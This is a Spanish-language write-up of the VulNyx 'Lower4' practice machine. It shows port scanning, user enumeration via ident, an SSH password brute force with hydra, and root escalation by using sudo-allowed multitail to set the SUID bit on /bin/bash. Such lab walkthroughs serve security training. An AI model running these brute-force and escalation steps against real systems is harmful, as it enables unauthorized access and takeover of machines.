VulNyx - Lower4 | d4t4s3c hacks & pills

Information

Lower4 es una máquina virtual vulnerable Linux de dificultad baja de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.

Enumeration

Nmap

TCP

❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-16 09:28 CET
Nmap scan report for 192.168.1.65
Host is up (0.00010s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
113/tcp open  ident

❯ nmap -sVC -p22,80,113 192.168.1.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-16 09:29 CET
Nmap scan report for 192.168.1.65
Host is up (0.00081s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
|_auth-owners: root
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
113/tcp open  ident?
|_auth-owners: lucifer

Shell (lucifer)

80/TCP (HTTP)

Site

Directory Brute Force

❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.65 -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.65
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================

113/TCP (IDENT)

User Enumeration

Enumero al usuario lucifer mediante el servicio ident

❯ nmap -sC -p113 192.168.1.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-16 09:37 CET
Nmap scan report for 192.168.1.65
Host is up (0.00037s latency).

PORT    STATE SERVICE
113/tcp open  ident
|_auth-owners: lucifer

22/TCP (SSH)

Password Brute Force

En tenecia de un usuario realizo con hydra fuerza bruta y obtengo el password 789456123

❯ hydra -t 64 -l lucifer -P /opt/techyou.txt ssh://192.168.1.65
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-16 09:39:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 10000 login tries (l:1/p:10000), ~157 tries per task
[DATA] attacking ssh://192.168.1.65:22/
[22][ssh] host: 192.168.1.65   login: lucifer   password: 789456123
1 of 1 target successfully completed, 1 valid password found

Accedo al sistema como usuario lucifer con las credenciales obtenidas

❯ ssh lucifer@192.168.1.65
lucifer@192.168.1.65's password: 
lucifer@lower4:~$ id ; hostname
uid=1000(lucifer) gid=1000(lucifer) grupos=1000(lucifer)
lower4

Privilege Escalation

Enumeration

Sudo

El usuario lucifer puede ejecutar como root el binario multitail con sudo

lucifer@lower4:~$ sudo -l
Matching Defaults entries for lucifer on lower4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucifer may run the following commands on lower4:
    (root) NOPASSWD: /usr/bin/multitail

Revisando el man de multitail veo un parámetro interesante que permite ejecución de comandos

-l - Command to execute in a window. Parameter is the command.

Abuse

Le asigno permisos 4755 (SUID) a la /bin/bash y me convierto en usuario root

lucifer@lower4:~$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1234376 mar 27  2022 /bin/bash
lucifer@lower4:~$ sudo -u root /usr/bin/multitail -l "chmod 4755 /bin/bash"
lucifer@lower4:~$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1234376 mar 27  2022 /bin/bash
lucifer@lower4:~$ /bin/bash -pi
bash-5.1# id ; hostname
uid=1000(lucifer) gid=1000(lucifer) euid=0(root) grupos=1000(lucifer)
lower4

Flags

Ya como usuario root puedo leer las flags user.txt y root.txt

bash-5.1# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
c07d****************************
8e99****************************

Hasta aquí la resolución de la máquina Lower4.

Happy Hacking!